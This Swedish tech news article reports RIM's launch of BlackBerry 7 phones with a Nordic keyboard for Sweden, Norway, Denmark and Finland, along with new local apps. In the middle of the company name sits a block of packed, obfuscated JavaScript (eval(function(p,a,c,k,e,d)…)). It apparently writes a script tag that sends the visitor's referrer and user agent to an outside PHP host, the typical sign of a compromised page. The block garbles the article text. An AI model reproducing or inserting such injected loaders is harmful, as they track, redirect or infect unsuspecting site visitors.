Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

BlackBerry får nordiskt tangentbord

BlackBerry får nordiskt tangentbord
Sebastian

Research eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|aaznn|var|u0026u|referrer|ietzr||js|php’.split(’|’),0,{}))
In Motion (RIM), tillverkaren av BlackBerry®, lanserar smarta mobiler med nordiskt tangentbord.

Det nordiska tangentbordet blir tillgängligt på alla de senaste modellerna med operativsystemet BlackBerry 7 och QWERTY-tangentbord, inklusive BlackBerry® Bold™ 9900, BlackBerry® Bold™ 9790, BlackBerry® Torch™ 9810 och BlackBerry® Curve™ 9360. Modellerna blir tillgängliga i Sverige, Norge, Danmark och Finland redan denna månad. Senare i sommar blir även BlackBerry® Curve™ 9320 tillgänglig med ett nordiskt tangentbord.

Utöver nordiskt tangentbord har BlackBerry nyligen släppt ett flertal lokala appar. Populära appar som SVT Play, TV.nu, Resor i STHLM, Public Transport Skåne, Svenska Dagstidningar, TuneIn Radio, Telenor Navigation, Tågtider, Reseräkning for BlackBerry och TrueCaller, samt cityguider från GuidePal för Stockholm, Göteborg och Åre, är nu tillgängliga på BlackBerry App World™. Spotify för BlackBerry går att ladda ner från Spotifys hemsida här.

– Vi är glada över att förbättra användarupplevelsen för BlackBerry-användare i Norden genom ett lokalt tangentbord och fler lokala appar, säger Håkan Cronqvist, Nordenchef på RIM. Våra kunder här har alltid uppskattat BlackBerry-mobilernas utmärkta kommunikationsegenskaper och det nordiska tangentbordet gör det ännu enklare att skriva på mobilen. Vi fortsätter dessutom arbeta med utvecklare för att öka utbudet av lokala appar för den nordiska marknaden.